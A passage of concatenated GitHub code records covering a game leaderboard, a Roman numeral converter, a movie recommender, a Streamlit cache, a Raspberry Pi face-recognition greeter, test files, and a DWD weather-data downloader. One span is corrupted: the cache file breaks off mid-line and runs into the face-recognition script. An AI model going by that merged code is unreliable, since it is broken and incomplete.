\"name\": player.name,\n \"record\": player.record\n })\n\n json.dump(data, file)\n file.close()\n\n @staticmethod\n def get_top_players():\n data = Data.get_records()\n sorted_data = sorted(data, key=lambda obj: obj[\"record\"], reverse=True)\n top_board = \"\"\n for i, player in enumerate(sorted_data, start=1):\n if i == 1: top_board += Fore.LIGHTRED_EX\n elif i == 2: top_board += Fore.LIGHTYELLOW_EX\n elif i == 3: top_board += Fore.YELLOW\n else: top_board+= Fore.RESET\n\n top_board += f\"\\t\\t{i}. {player['name']}: {player['record']} points.\\n\"\n\n return top_board\n","repo_name":"EloyRDev/Snython","sub_path":"src/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39763483935","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n values = [ 1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1 ]\n numerals = [ \"M\", \"CM\", \"D\", \"CD\", \"C\", \"XC\", \"L\", \"XL\", \"X\", \"IX\", \"V\", \"IV\", \"I\" ]\n res = \"\"\n for i, v in enumerate(values):\n if num>=v:\n res = res + numerals[i]*(num//v)\n num = num % v\n return res","repo_name":"narendrasinghdangi/leetcode-problems","sub_path":"0012-integer-to-roman/0012-integer-to-roman.py","file_name":"0012-integer-to-roman.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16769051812","text":"#10-27\n#Collaborative filtering implemented with a neural network\n#Tested and working\n#Runtime is roughly 1 min\n\nimport numpy as np\nimport sys\nimport scipy.io as sio\nimport scipy.optimize as opt\n\n#r(i,j): indicates that user j rated movie i\n# y(i,j): the rating user j gave movie i (if the user rated that movie)\n\n# x(i): feature vector of movie i\n# θ(j): parameter vector of user j's movie ratings\n\n#Latent factor model, a machine-learning-based approach\nclass lfmRS(object):\n def __init__(self):\n self.initialset = {}\n # self.user_matrix=[]\n self.r=[]\n self.y=[]\n self.x=[]\n self.theta=[]\n self.n_features=50\n self.l=10\n self.movie_list=[]\n self.n_rec_movie = 3\n\n print('recommended movie number = %d' %\n self.n_rec_movie, file=sys.stderr)\n\n #Load the data\n @staticmethod\n def loadfile(filename):\n fr=open(filename,'r',encoding='UTF-8')\n\n for i ,line in enumerate(fr):\n yield line.strip('\\r\\n')\n\n fr.close()\n print(\"load %s success\" % filename,file=sys.stderr)\n\n\n #Initial data set\n def initial_dataset(self,filename1):\r\n initialset_len=0\r\n\r\n for lines in self.loadfile(filename1):\r\n id,users,movies,ratings=lines.split(',')\r\n # print(users,movies,ratings)\r\n self.initialset.setdefault(users,{})\r\n self.initialset[users][movies]=(ratings)\r\n initialset_len+=1\r\n\r\n # for key,value in self.initialset.items():\r\n # print(key,value)\r\n # self.user_matrix.append(key)\r\n\r\n print(\"load data set success\" , file=sys.stderr)\r\n print('dataset=%s' % initialset_len,file=sys.stderr)\r\n\r\n\r\n\r\n #Build the movie-user matrix\r\n #r(i,j): indicates that user j rated movie i\r\n #y(i,j): the rating user j gave movie i (if the user rated that movie)\r\n #Initialize x and theta\r\n def build_matrix(self,filename1,filename2):\r\n movie_len=0\r\n user_len=0\r\n\r\n movie_matrix=[]\r\n user_matrix=[]\r\n\r\n for lines in self.loadfile(filename2):\r\n imdbid=lines.split(',')[0]\r\n title=lines.split(',')[1]#read in the movie title\r\n self.movie_list.append(title)\r\n movie_matrix.append(imdbid)\r\n movie_len+=1\r\n\r\n\r\n for lines in self.loadfile(filename1):\r\n id=lines.split(',')[0]\r\n user_matrix.append(id)\r\n user_len+=1\r\n\r\n print(\"user:%d,movie:%d\" %(user_len,movie_len),file=sys.stderr)\r\n\r\n self.r=np.zeros((movie_len,user_len))\r\n self.y = np.zeros((movie_len, user_len))\r\n\r\n for key,value in self.initialset.items():\r\n for i in value:\r\n for k in range(len(movie_matrix)): #find the movie's position in the original array\r\n if (movie_matrix[k] == i):\r\n mvid=k\r\n break\r\n self.r[mvid][int(key) - 1000 - 1] = self.initialset[key][i]\r\n self.y[mvid][int(key) - 1000 - 1]=1\r\n\r\n\r\n # Parameter handling\r\n\r\n # pack x and theta into a single value so they can be passed together\r\n # merge\r\n def merge(self,x, theta):\r\n return np.concatenate((x.ravel(), theta.ravel()))\r\n\r\n # separate\r\n def separate(self,param, n_movies, n_users, n_features):\r\n return param[:n_movies * n_features].reshape(n_movies, n_features), param[n_movies * n_features:].reshape(\r\n n_users, n_features)\r\n\r\n # 2. compute the loss\r\n def cost(self,param, y, r, n_features):\r\n n_movies, n_users = y.shape # y has shape movies x users\r\n x, theta = self.separate(param, n_movies, n_users, n_features)\r\n\r\n inner = np.multiply(np.dot(x, theta.T) - y, r) # multiply by r to keep only rated entries\r\n inner_cost = (1 / 2) * np.sum(np.power(inner, 2))\r\n return inner_cost\r\n\r\n # add regularization\r\n def regular_cost(self,param, y, r, n_features, l=1):\r\n n_movies, n_users = y.shape\r\n x, theta = self.separate(param, n_movies, n_users, n_features)\r\n\r\n inner_cost = self.cost(param, y, r, n_features)\r\n\r\n regular = (l / 2) * np.sum(np.power(param, 2))\r\n return inner_cost + regular\r\n\r\n # 3. compute the gradient\r\n def grad(self,param, y, r, n_features):\r\n n_movies, n_users = y.shape\r\n x, theta = self.separate(param, n_movies, n_users, n_features)\r\n\r\n inner = np.multiply(np.dot(x, theta.T) - y, r)\r\n x_grad = np.dot(inner, theta)\r\n\r\n theta_grad = np.dot(inner.T, x)\r\n\r\n return self.merge(x_grad, theta_grad)\r\n\r\n # add regularization\r\n def regular_grad(self,param, y, r, n_features, l=1):\r\n inner_grad = self.grad(param, y, r, n_features)\r\n regular = l * param # param is the concatenation of x and theta\r\n return inner_grad + regular\r\n\r\n\r\n def recommend(self,userid,filename2):\r\n n_movies,n_users=self.y.shape\r\n n_features=self.n_features\r\n l=self.l\r\n r=self.r\r\n y=self.y\r\n N=self.n_rec_movie\r\n movie_list=self.movie_list\r\n rec_list=[]\r\n rec_id=[]\r\n\r\n x_origin = np.random.standard_normal((n_movies, n_features))\r\n theta_origin = np.random.standard_normal((n_users, n_features))\r\n # param=np.concatenate((x_origin.ravel(), theta_origin.ravel()))\r\n param=self.merge(x_origin,theta_origin)\r\n\r\n y_mean=y-y.mean()\r\n\r\n # optimize via the gradient\r\n res = opt.minimize(fun=self.regular_cost, x0=param, args=(y_mean, r, n_features, l), jac=self.regular_grad, method='TNC')\r\n param_train = res.x\r\n\r\n # predict with the learned movie features and user preferences\r\n x_train, theta_train = self.separate(param_train, n_movies, n_users, n_features)\r\n\r\n predict = np.dot(x_train, theta_train.T)\r\n\r\n real_predict=predict[:,userid]+y.mean()\r\n # sort in descending order\r\n idx = np.argsort(real_predict)[::-1]\r\n print('----------------------')\r\n print(real_predict[idx][:N]) # print the ratings of the rows for the top 10 indices\r\n print('----------------------')\r\n\r\n\r\n print('Recommended movies:')\r\n movie_list=np.array(movie_list)\r\n for i in movie_list[idx][:N]:\r\n rec_list.append(i)\r\n print(i)\r\n\r\n for lines in self.loadfile(filename2):\r\n imdbid=lines.split(',')[0]\r\n title=lines.split(',')[1]#read in the movie title\r\n if title in rec_list:\r\n rec_id.append(imdbid)\r\n print(rec_id)\r\n\r\n return rec_id\r\n","repo_name":"iambajie/movie-recommend","sub_path":"users/recommend/recommend_lfm.py","file_name":"recommend_lfm.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3429764223","text":"import os\nimport json\nimport shutil\nfrom utils.helpers import remove_dir\nimport streamlit as st\ndef delete_from_cache(id):\n path = f'dataset/cache/{id}'\n ids = load_metadata()\n if(id in ids):\n #Remove\n ids.remove(id)\n save_metadata(ids)\n try:\n shutil.rmtree(path)\n except Exception as e:\n pass \n\n\n return ids\ndef add_to_cache(id):\n cache_size =int(os.environ[\"CACHE_SIZE\"])\n ## Load Metadata\n ids = load_metadata()\n ## Append ID\n if(id in ids):\n delete_from_cache(id)\n if(len(ids) THREDHOLD\n\n def capture_still_image(self):\n return \"imgs/test1.jpg\"\n t = time.strftime(\"%Y%m%d_%H%M%S\")\n path = \"imgs/%s.jpg\" % t\n popen = subprocess.Popen(['raspistill','-vf', '-w','200','-h','200','-o',path])\n ret = popen.communicate()\n return path\n\n def is_screen_changed(self, new_path, old_path):\n return True\n\n def is_somebody_in_picture(self, path):\n return True\n\n def recognize_with_facepp(self, path):\n\n # rst = api.recognition.identify(group_name = 'test', url = TARGET_IMAGE)\n rst = api.recognition.identify(group_name = 'saladgroup', img = File(path))\n print('recognition result', rst)\n print('=' * 60)\n if len(rst['face']) > 0 and len(rst['face'][0]['candidate']) > 0:\n print('The person with highest confidence:', \\\n rst['face'][0]['candidate'][0]['person_name'])\n return rst\n\n def is_only_master_in_picture(self, regn):\n if len(regn['face']) > 1 :\n return False\n\n if len(regn['face']) > 0:\n if len(regn['face'][0]['candidate']) > 0:\n return self._is_someone(regn['face'][0]['candidate'], MASTER)\n\n return False\n\n def is_friend(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n return self._is_someone(candicates[0], FRIEND)\n\n return False\n\n def is_only_stranger_in_picture(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n is_stranger = True\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candicates[0], MASTER) or self._is_someone(candicates[0], FRIEND):\n print('not a stranger')\n is_stranger = False\n break\n\n return is_stranger\n\n def is_master_with_others(self, regn):\n if len(regn['face']) <= 1 :\n return False\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candicates[0], MASTER):\n return True\n\n return False\n\n def welcome_master_with_others(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_friend(self):\n 
pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_master(self):\n pygame.mixer.music.load(\"res/welecomehome_master.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def yield_at_stranger(self):\n pygame.mixer.music.load(\"res/yield_at_stranger.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n\n def run_forever(self):\n while True:\n path = self.capture_still_image()\n changed = self.is_screen_changed(path, self.last_path)\n if not changed:\n # Sleep\n continue\n sb = self.is_somebody_in_picture(path)\n if not sb:\n # Sleep\n continue\n\n ret = self.recognize_with_facepp(path)\n if self.is_master_with_others(ret):\n self.welcome_master_with_others()\n elif self.is_friend(ret):\n self.welcome_friend()\n elif self.is_only_master_in_picture(ret):\n self.welcome_master()\n elif self.is_only_stranger_in_picture(ret):\n self.yield_at_stranger()\n\n\nif __name__ == \"__main__\":\n alex = PoliteAlex()\n alex.run_forever()\n","repo_name":"alex-chan/raspalex","sub_path":"polite_alex.py","file_name":"polite_alex.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35819322465","text":"import os\nimport pytest\n\nfrom plenum.server.node import Node\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(tconf):\n old_val = tconf.VALIDATOR_INFO_USE_DB\n tconf.VALIDATOR_INFO_USE_DB = True\n yield tconf\n tconf.VALIDATOR_INFO_USE_DB = old_val\n\n\ndef test_dump_general_info_use_db(tconf, node):\n node._info_tool.dump_general_info()\n file_name = node._info_tool.GENERAL_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n db_name = node._info_tool.GENERAL_DB_NAME_TEMPLATE.format(node_name=node.name.lower())\n db_path = os.path.join(node.node_info_dir, db_name)\n assert os.path.exists(file_path)\n assert os.path.exists(db_path)\n\n\ndef test_dump_additional_info(node):\n Node.dump_additional_info(node)\n file_name = node._info_tool.ADDITIONAL_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n assert os.path.exists(file_path)\n\n\ndef test_file_version_info(node):\n file_name = node._info_tool.VERSION_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n assert os.path.exists(file_path)\n assert os.path.getsize(file_path) > 0\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/validator_info/test_validator_info_dump.py","file_name":"test_validator_info_dump.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"3663398715","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom .DFTBcal import *\nfrom ..Neuralnetwork import *\nfrom ..Base import *\nfrom ..Comparm import GPARAMS \nimport numpy as np\n\ndef Cal_NN_EFQ(NNSet,inpath='./'):\n ERROR_mols=[]\n ERROR_strlist=[]\n MSet_list=[MSet('ID%d'%i) for i in range(len(GPARAMS.Esoinn_setting.NNdict['NN']))]\n Mol_label=[[] for i in NNSet.mols]\n if GPARAMS.Esoinn_setting.NNdict[\"Charge\"]!=None:\n N_Times=math.ceil(len(NNSet.mols)/GPARAMS.Neuralnetwork_setting.Batchsize)\n QMCHARGE=[]\n for i in range(N_Times):\n TMMSET=MSet('tmp')\n 
TMMSET.mols=NNSet.mols[i*GPARAMS.Neuralnetwork_setting.Batchsize:(i+1)*GPARAMS.Neuralnetwork_setting.Batchsize]\n# try:\n atom_charge=\\\n Eval_charge(TMMSET,GPARAMS.Esoinn_setting.NNdict[\"Charge\"])\n# except:\n# atom_charge=[]\n QMCHARGE+=list(atom_charge)\n for i in range(len(NNSet.mols)):\n for j in NNSet.mols[i].belongto:\n MSet_list[j].mols.append(NNSet.mols[i])\n Mol_label[i].append([j,len(MSet_list[j].mols)-1])\n E=[];F=[];Dipole=[];Charge=[]\n for i in range(len(GPARAMS.Esoinn_setting.NNdict[\"NN\"])):\n if len(MSet_list[i].mols)>0:\n N_Times=math.ceil(len(MSet_list[i].mols)/GPARAMS.Neuralnetwork_setting.Batchsize)\n E_tmp=[];F_tmp=[];Dipole_tmp=[];Charge_tmp=[]\n for j in range(N_Times):\n TMMSET=MSet('tmp')\n TMMSET.mols=MSet_list[i].mols[j*GPARAMS.Neuralnetwork_setting.Batchsize:(j+1)*GPARAMS.Neuralnetwork_setting.Batchsize]\n #print (\"NN Calculation at here!\")\n #Etotal,Ebp,Ebp_atom,Ecc,Evdw,mol_dipole,atom_charge,gradient,hess=\\\n Etotal,Ebp,Ebp_atom,Ecc,Evdw,mol_dipole,atom_charge,gradient=\\\n EvalSet(TMMSET,GPARAMS.Esoinn_setting.NNdict[\"NN\"][i])\n #print (\"NN Calculation at over!\")\n E_tmp+=list(Etotal);F_tmp+=list(gradient);Dipole_tmp+=list(mol_dipole);Charge_tmp+=list(atom_charge)\n E.append(E_tmp)\n F.append(F_tmp)\n Dipole.append(Dipole_tmp)\n Charge.append(Charge_tmp)\n else:\n E.append([])\n F.append([])\n Dipole.append([])\n Charge.append([])\n MAX_ERR=[]\n NN_predict=[]\n for i,imol in enumerate(NNSet.mols):\n ERROR_str=''\n E_i=[];F_i=[];D_i=[];Q_i=[]\n for j in Mol_label[i]:\n E_i.append(E[j[0]][j[1]])\n F_i.append(F[j[0]][j[1]][0:len(imol.coords)])\n D_i.append(Dipole[j[0]][j[1]])\n Q_i.append(Charge[j[0]][j[1]][0:len(imol.coords)])\n E_i=np.array(E_i)*627.51\n F_i=np.array(F_i)*627.51/JOULEPERHARTREE\n D_i=np.array(D_i)\n Q_i=np.array(Q_i)\n NN_num=len(imol.belongto)\n if NN_num <=3:\n N_num=min(2,NN_num)\n else:\n N_num=math.ceil((NN_num+1)/2)\n E_avg=np.mean(E_i)\n F_avg=np.mean(F_i,axis=0)\n #tmp_list=np.argsort(np.max(np.reshape(np.square(F_i-F_avg),(len(imol.belongto),-1)),1))[:N_num]\n tmp_list=np.argsort(np.max(np.reshape(np.square(F_i-F_avg),(len(imol.belongto),-1)),1))\n F_New=[F_i[m] for m in tmp_list]\n F_avg=np.mean(F_New,axis=0)\n E_New=[E_i[m] for m in tmp_list]\n D_New=[D_i[m] for m in tmp_list]\n Q_New=[Q_i[m] for m in tmp_list]\n E_avg=np.mean(E_New)\n D_avg=np.mean(D_New,axis=0)\n Q_avg=np.mean(Q_New,axis=0)\n MSE_F=np.square(F_New-F_avg).mean(axis=0)\n MAX_MSE_F=-np.sort(-np.reshape(MSE_F,-1))[0]\n MAX_ERR.append(MAX_MSE_F)\n method='NN'\n if MAX_MSE_F > GPARAMS.Train_setting.sigma**2 and MAX_MSE_F<(GPARAMS.Train_setting.sigma*3)**2:\n ERROR_str+='%s in NNSet is not believable, MAX_MSE_F: %f\\n '%(imol.name,MAX_MSE_F)\n ERROR_strlist.append(ERROR_str)\n ERROR_mols.append([NNSet.mols[i],MAX_MSE_F])\n NN_predict.append([E_avg,F_avg,D_avg,Q_avg])\n\n if GPARAMS.Esoinn_setting.NNdict[\"Charge\"]!=None:\n for i in range(len(NNSet.mols)):\n NN_predict[i][3]=QMCHARGE[i]\n return NN_predict,ERROR_mols,MAX_ERR,ERROR_strlist,method\n\n","repo_name":"MingyuanXu/ESOINN-DP","sub_path":"build/lib/ESOI_HDNN_MD/Computemethod/NNcal.py","file_name":"NNcal.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"1099634936","text":"# Benötigte Module laden\n## Übliche Module\nimport datetime as dt\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport pandas_profiling as pp\nimport os, shutil\nimport zipfile as zip\nimport re\nimport 
random\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport matplotlib.pyplot as plt\n\n## Statsmodel\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport statsmodels.tsa.api as smt\n\n## Crawler im weiteren Sinne\nfrom bs4 import BeautifulSoup\nimport requests\nfrom ftplib import FTP\n\n# Angabe eines headers, da der Server sonst den request ablehnen könnte\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n\n# Definition der Tage für die Wettervorhersage\nd0 = dt.date.today()\nd1 = d0 + dt.timedelta(days=1)\nd2 = d0 + dt.timedelta(days=2)\nd3 = d0 + dt.timedelta(days=3)\n\n\n# Daten als CSV wegschreiben\ndef save_csv(quelle, name):\n dataframe = quelle\n dataframe.to_csv(name + \".csv\", index=0)\n dataframe = pd.read_csv(name + \".csv\")\n print('Der Datensatz wurde erfolgreich gespeichert')\n print(\"Er umfasst: \",dataframe.shape[0],\"Zeilen und \",dataframe.shape[1],\"Spalten\")\n return dataframe.head()\n\n\ndef Beschreibung_Stationen1():\n file = 'KL_Tageswerte_Beschreibung_Stationen.txt'\n \n if os.path.isdir('backlog') == False:\n os.mkdir('backlog')\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/daily/kl/recent/')\n \n list1 = ftp.nlst()\n \n if file in list1:\n ftp.retrbinary('RETR ' + file, open('backlog/' + file, 'wb').write)\n print('Beschreibung der Stationen vom FTP heruntergeladen und abgelegt')\n else:\n print('Beschreibung der Stationen vom FTP nicht verfügbar')\n \n ftp.quit()\n\n\ndef Beschreibung_Stationen2():\n file = 'KL_Standardformate_Beschreibung_Stationen.txt'\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/subdaily/standard_format/')\n \n list1 = ftp.nlst()\n \n if file in list1:\n ftp.retrbinary('RETR ' + file, open('backlog/' + file, 'wb').write)\n print('Beschreibung der Stationen vom FTP heruntergeladen und abgelegt')\n else:\n print('Beschreibung der Stationen vom FTP nicht verfügbar')\n \n ftp.quit()\n \n\ndef Stationen_importieren1(von_datum):\n list1 = []\n \n file = 'KL_Tageswerte_Beschreibung_Stationen.txt'\n \n with open('backlog/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n \n imp = str(imp).split('\\n')\n \n for x in imp:\n y = re.split('\\s+', x)\n list1 += [y]\n \n df = pd.DataFrame.from_dict(list1)\n # Erste Zeile enthält die Spaltenbezeichnungen\n headers = df.iloc[0]\n df = pd.DataFrame(df.values[1:], columns=headers)\n \n # Spalten-Bereinigung beim Import\n # Stationsnamen und Bundesländer wurden in mehrere Spalten getrennt\n #df = df.replace([None], [' '], regex=True)\n df = df.replace(np.NaN, ' ', regex=True)\n \n df = df.rename(columns={df.columns.get_values()[8]: 'a1'})\n cols=pd.Series(df.columns)\n for dup in df.columns.get_duplicates(): \n cols[df.columns.get_loc(dup)] = [dup+'.'+str(d_idx) if d_idx!=0 else dup for d_idx in range(df.columns.get_loc(dup).sum())]\n df.columns=cols\n df['ColumnA'] = df[df.columns[6:]].apply(lambda x: ' '.join(x.astype(str)), axis=1)\n df = df.drop(df.columns[6:12], axis=1)\n \n # Zeilen-Bereinigung beim Import\n df = df.drop([0]) # Erste Zeile (Trennzeichen) löschen\n df = df[:-1] # Letzte Zeile (Leerzeile) löschen\n \n # Datum umwandeln\n df['von_datum2'] = pd.to_datetime(df['von_datum'], format='%Y%m%d')\n df['bis_datum2'] = pd.to_datetime(df['bis_datum'], format='%Y%m%d')\n df = df.drop(df.columns[1:3], axis=1)\n 
df['von_datum'] = df['von_datum2']\n df['bis_datum'] = df['bis_datum2']\n df = df.drop(df.columns[5:7], axis=1)\n \n # Stationsname und Bundesland trennen (Reste aus der Spalten-Bereinigung)\n df[['Stationsname','Bundesland']] = df['ColumnA'].str.rsplit(expand=True, n=1)\n df = df.drop(['ColumnA'], axis=1)\n \n # Nur aktuelle Stationen beibehalten\n df = df.loc[df['bis_datum'] >= von_datum]\n \n print('Beschreibung der Stationen vom FTP importiert')\n\n return df\n\n\ndef Stationen_importieren2(von_datum):\n list1 = []\n \n file = 'KL_Standardformate_Beschreibung_Stationen.txt'\n \n with open('backlog/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n \n imp = str(imp).split('\\n')\n \n for x in imp:\n y = re.split('\\s+', x)\n list1 += [y]\n \n df = pd.DataFrame.from_dict(list1)\n # Erste Zeile enthält die Spaltenbezeichnungen\n headers = df.iloc[0]\n df = pd.DataFrame(df.values[1:], columns=headers)\n \n df = df.drop(df.index[81:], axis=0)\n df = df.drop(df.index[0], axis=0)\n \n #df = df.replace([None], [' '], regex=True)\n df = df.replace(np.NaN, ' ', regex=True)\n \n df = df.rename(columns={df.columns.get_values()[9]: 'a1'})\n df = df.rename(columns={df.columns.get_values()[10]: 'a1'})\n df = df.rename(columns={df.columns.get_values()[11]: 'a1'})\n cols=pd.Series(df.columns)\n for dup in df.columns.get_duplicates(): \n cols[df.columns.get_loc(dup)] = [dup+'.'+str(d_idx) if d_idx!=0 else dup for d_idx in range(df.columns.get_loc(dup).sum())]\n df.columns=cols\n df['ColumnA'] = df[df.columns[7:]].apply(lambda x: ' '.join(x.astype(str)), axis=1)\n df = df.drop(df.columns[7:12], axis=1)\n \n df['von_datum'] = pd.to_datetime(df['von'], format='%Y%m%d')\n df['bis_datum'] = pd.to_datetime(df['bis'], format='%Y%m%d')\n df = df.drop(df.columns[2:4], axis=1)\n \n # Stationsname und Bundesland trennen (Reste aus der Spalten-Bereinigung)\n df[['Stationsname','Bundesland']] = df['ColumnA'].str.rsplit(expand=True, n=1)\n df = df.drop(['ColumnA'], axis=1)\n \n print('Beschreibung der Stationen vom FTP importiert')\n\n return df\n\n\ndef Tageswerte_downloaden(stations_ids): \n list1, list2, list3, list4 = [], [], [], []\n \n d0 = dt.date.today()\n pfad = 'backlog/' + str(d0)\n os.makedirs(pfad, exist_ok=True)\n \n # Verbindung aufbauen\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/daily/kl/recent/')\n \n # Verzeichnis auslesen\n list1 = ftp.nlst()\n\n for x in stations_ids:\n file1 = 'tageswerte_KL_' + x + '_akt.zip'\n\n if file1 in list1:\n ftp.retrbinary('RETR ' + file1, open(pfad + '/' + file1, 'wb').write)\n else:\n list3 += [x]\n \n ftp.quit()\n \n # Verbindung trennen und neu aufbauen\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/subdaily/standard_format/')\n \n #Verzeichnis auslesen\n list2 = ftp.nlst()\n \n for x in list3:\n file2 = 'kl_' + x + '_00_akt.txt'\n \n if file2 in list2:\n ftp.retrbinary('RETR ' + file2, open(pfad + '/' + file2, 'wb').write)\n else:\n list4 += [x]\n \n ftp.quit()\n \n # Verbindung trennen\n for x in list4:\n print(x + ' wurde auf dem FTP nicht gefunden')\n \n print('Alle anderen Tageswerte heruntergeladen und abgelegt')\n\n\ndef Tageswerte_entpacken(datum): \n pfad = 'backlog/' + datum\n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n\n if os.path.isdir(pfad_entpackt) == False:\n os.mkdir(pfad_entpackt)\n\n for file in os.listdir(pfad):\n if file.endswith('.zip'):\n with zip.ZipFile(pfad + '/' + file, 'r') as zip_ref:\n 
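# --- Editor's note: illustrative sketch, not part of the original funktionen_0.py record. ---
# The download helpers above all follow one pattern: list the FTP directory with nlst(),
# download only files that are actually present via retrbinary(), and report the misses.
# A minimal standalone version; the host and directory are the real DWD endpoints taken
# from the record, while the station id in the commented call is a hypothetical example:
from ftplib import FTP

def fetch_if_present(host, directory, filename, local_path):
    ftp = FTP(host)
    ftp.login()                      # anonymous login, as in the record
    ftp.cwd(directory)
    available = ftp.nlst()           # directory listing
    found = filename in available
    if found:
        with open(local_path, 'wb') as fh:
            ftp.retrbinary('RETR ' + filename, fh.write)
    ftp.quit()
    return found

# fetch_if_present('opendata.dwd.de',
#                  'climate_environment/CDC/observations_germany/climate/daily/kl/recent/',
#                  'tageswerte_KL_00044_akt.zip', 'tageswerte_KL_00044_akt.zip')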
list1 = zip_ref.namelist()\n for file in list1:\n if file.startswith('produkt_klima_tag_'):\n zip_ref.extract(member=file, path=pfad)\n else:\n pass\n zip_ref.close()\n else:\n pass\n\n if file.endswith('.txt'):\n shutil.move(pfad + '/' + file, pfad_entpackt + '/' + file)\n else:\n pass\n \n print('Alle Tageswerte zum Datum ' + datum + ' im gleichnamigen Verzeichnis entpackt oder verschoben')\n\n\ndef Tageswerte_importieren1(datum, ab_datum, ausgabe): \n filelist = []\n \n dataframe_temp = pd.DataFrame()\n dataframe = pd.DataFrame()\n \n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n \n for file in os.listdir(pfad_entpackt):\n if file.startswith('produkt_klima_tag_') and file.endswith('.txt'):\n filelist += [file]\n \n for file in filelist:\n with open(pfad_entpackt + '/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n imp = str(imp).split('\\n')\n \n dataframe_temp = pd.DataFrame.from_dict(imp)\n dataframe_temp = dataframe_temp.replace(' ', '', regex=True)\n dataframe_temp = dataframe_temp[0].str.split(';', expand=True)\n \n headers = dataframe_temp.iloc[0]\n dataframe_temp = pd.DataFrame(dataframe_temp.values[1:], columns=headers)\n \n dataframe_temp = dataframe_temp.dropna()\n dataframe_temp['MESS_DATUM2'] = pd.to_datetime(dataframe_temp['MESS_DATUM'], format='%Y%m%d')\n dataframe_temp = dataframe_temp.drop(['MESS_DATUM', 'QN_3', 'QN_4', 'eor'], axis=1)\n dataframe_temp = dataframe_temp.rename({'MESS_DATUM2': 'MESS_DATUM'}, axis=1)\n dataframe_temp = dataframe_temp.loc[dataframe_temp['MESS_DATUM'] >= ab_datum]\n dataframe_temp['MESS_DATUM'] = dataframe_temp['MESS_DATUM'].astype('datetime64[D]')\n dataframe_temp['STATIONS_ID'] = dataframe_temp['STATIONS_ID'].astype('category')\n dataframe_temp['RSKF'] = dataframe_temp['RSKF'].astype('category')\n dataframe_temp['NM'] = dataframe_temp['NM'].astype('category')\n \n if ausgabe == 1:\n print(file, len(dataframe_temp))\n \n dataframe = dataframe.append(dataframe_temp)\n dataframe_temp = pd.DataFrame()\n\n print('Tageswerte ab dem ' + ab_datum + ' in das DataFrame importiert')\n \n return dataframe\n\n\ndef Tageswerte_importieren2(datum, ab_datum, ausgabe):\n # Anhand des KX-Formats der Datensatzbeschreibung ergibt sich aus dem importierten String mit 288 Zeichen eine \n # Reihenfolge, nach der ab einer bestimmten Zeichenzahl ein Split durchgeführt werden muss\n split = [2, 7, 11, 13, 15, 19, 24, 25, 30, 31, 36, 37, 42, 43, 47, 48, 52, 53, 56, 57, 61, 62, 63, 67, 68, 72, \n 73, 77, 78, 82, 83, 87, 88, 89, 93, 94, 95, 99, 100, 101, 104, 105, 108, 109, 112, 113, 116, 117, 120, \n 121, 124, 125, 128, 129, 132, 133, 136, 137, 140, 141, 144, 145, 147, 149, 150, 152, 154, 155, 157, 159, \n 160, 163, 164, 166, 167, 169, 170, 172, 173, 175, 176, 178, 179, 181, 182, 184, 185, 187, 188, 190, 191, \n 194, 195, 198, 199, 200, 202, 203, 205, 206, 208, 209, 211, 212, 214, 215, 217, 218, 220, 221, 223, 224, \n 226, 227, 231, 232, 233, 237, 238, 239, 243, 244, 245, 249, 250, 251, 254, 255, 256, 259, 260, 261, 264, \n 265, 269, 270, 275, 276, 281, 282]\n list2, 